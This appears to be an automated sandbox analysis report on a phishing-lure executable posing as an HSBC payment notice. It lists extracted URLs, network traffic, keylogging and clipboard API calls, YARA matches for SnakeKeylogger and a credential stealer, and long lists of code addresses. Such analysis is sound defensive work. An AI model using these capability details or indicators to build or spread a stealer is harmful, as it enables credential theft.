              Source: armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1488451296.0000000002050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://notify-stage.adobe.io/ans
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://notify-stage.adobe.io/ans/
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://notify-stage.adobe.io/anshttps://notify.adobe.io/ansEnableDesktopNotificationlocale
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://notify.adobe.io/ans
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://notify.adobe.io/ans/
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?https://p13n.adobe.io/psdk/v2/content?%Y-%m-%dT%H:%M:%SZ
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://p13n.adobe.io/psdk/v2/content?
              Source: armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1488451296.0000000002050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
              Source: armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://reviews.adobe.io
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://reviews.adobe.iourifullpayloadlinksinvitationURIreviewURIcommentingAssetURNEurekaInvitationI
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.com
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.com.adobe.ioassetUrnreviewUrnFilesFile
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.com0
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.ad
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.comK
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.comReadStatus
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.comcommandNameAdd_AnnotsDelete_AnnotsUpdate_AnnotsEurekaReviewFetchReviewUpdate
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.comemptyAnnotations
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.com
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.cominvalidAnnotIdList
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://scss.adobesc.comreasoncom.adobe.review.sdk
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49736 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000000.1308905605.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e20a479e-2
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000000.1308905605.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e86999f3-6
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f606d827-e
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7b6891e2-3
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
              Source: initial sampleStatic PE information: Filename: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F18140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CreateFileW,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,0_2_02F18140
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_00988140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CreateFileW,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,16_2_00988140
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\9624e934681120d9.binJump to behavior
              Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040E6A00_2_0040E6A0
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042D9750_2_0042D975
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040FCE00_2_0040FCE0
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004221C50_2_004221C5
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004362D20_2_004362D2
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004803DA0_2_004803DA
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0043242E0_2_0043242E
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004225FA0_2_004225FA
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045E6160_2_0045E616
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004166E10_2_004166E1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0043878F0_2_0043878F
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004368440_2_00436844
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004808570_2_00480857
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004188080_2_00418808
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004688890_2_00468889
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042CB210_2_0042CB21
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00436DB60_2_00436DB6
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00416F9E0_2_00416F9E
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004130300_2_00413030
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042F1D90_2_0042F1D9
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004231870_2_00423187
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004012870_2_00401287
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004214840_2_00421484
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004155200_2_00415520
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004276960_2_00427696
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004157600_2_00415760
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004219780_2_00421978
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00439AB50_2_00439AB5
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004E9CC80_2_004E9CC8
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00487DDB0_2_00487DDB
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00421D900_2_00421D90
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042BDA60_2_0042BDA6
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040DF000_2_0040DF00
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00413FE00_2_00413FE0
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00AC28E80_2_00AC28E8
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E00_2_02F162E0
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F1A3500_2_02F1A350
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F181400_2_02F18140
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F4F0800_2_02F4F080
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F547660_2_02F54766
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F3E5700_2_02F3E570
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F20A100_2_02F20A10
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F20B700_2_02F20B70
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F4CB100_2_02F4CB10
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F17E700_2_02F17E70
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F52F330_2_02F52F33
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F44F100_2_02F44F10
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F4BD800_2_02F4BD80
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F42D100_2_02F42D10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B443285_2_00B44328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4B5905_2_00B4B590
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B427B95_2_00B427B9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B459685_2_00B45968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B48DA05_2_00B48DA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B42DD15_2_00B42DD1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B45F905_2_00B45F90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4F1F85_2_00B4F1F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4F1E85_2_00B4F1E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4E4F05_2_00B4E4F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4E4E15_2_00B4E4E1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4B57F5_2_00B4B57F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4F7885_2_00B4F788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4F7785_2_00B4F778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4E9385_2_00B4E938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4E9485_2_00B4E948
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4EDA05_2_00B4EDA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00B4ED915_2_00B4ED91
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D645605_2_05D64560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6C1C05_2_05D6C1C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D699B85_2_05D699B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D600405_2_05D60040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D64BB05_2_05D64BB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D693605_2_05D69360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D67D975_2_05D67D97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6D5805_2_05D6D580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D67DA85_2_05D67DA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6BD5A5_2_05D6BD5A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6D5745_2_05D6D574
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6BD685_2_05D6BD68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6B4B85_2_05D6B4B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6AC085_2_05D6AC08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6EF905_2_05D6EF90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6EF825_2_05D6EF82
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6A7B05_2_05D6A7B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6A7A05_2_05D6A7A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D68F085_2_05D68F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6E6D15_2_05D6E6D1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D68EFB5_2_05D68EFB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6E6E05_2_05D6E6E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D686585_2_05D68658
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D686485_2_05D68648
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6DE305_2_05D6DE30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6DE215_2_05D6DE21
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6D9D85_2_05D6D9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6D9C85_2_05D6D9C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D681F05_2_05D681F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6B9105_2_05D6B910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6B9025_2_05D6B902
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6D1285_2_05D6D128
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D698B05_2_05D698B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6B0525_2_05D6B052
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6F8405_2_05D6F840
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6B0605_2_05D6B060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D600075_2_05D60007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6F8305_2_05D6F830
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6D0385_2_05D6D038
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6F3D85_2_05D6F3D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6ABFA5_2_05D6ABFA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6F3E85_2_05D6F3E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D63BB85_2_05D63BB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D63BA95_2_05D63BA9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D693535_2_05D69353
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D643405_2_05D64340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6EB385_2_05D6EB38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6EB295_2_05D6EB29
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6E2885_2_05D6E288
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D68AB05_2_05D68AB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D68AA35_2_05D68AA3
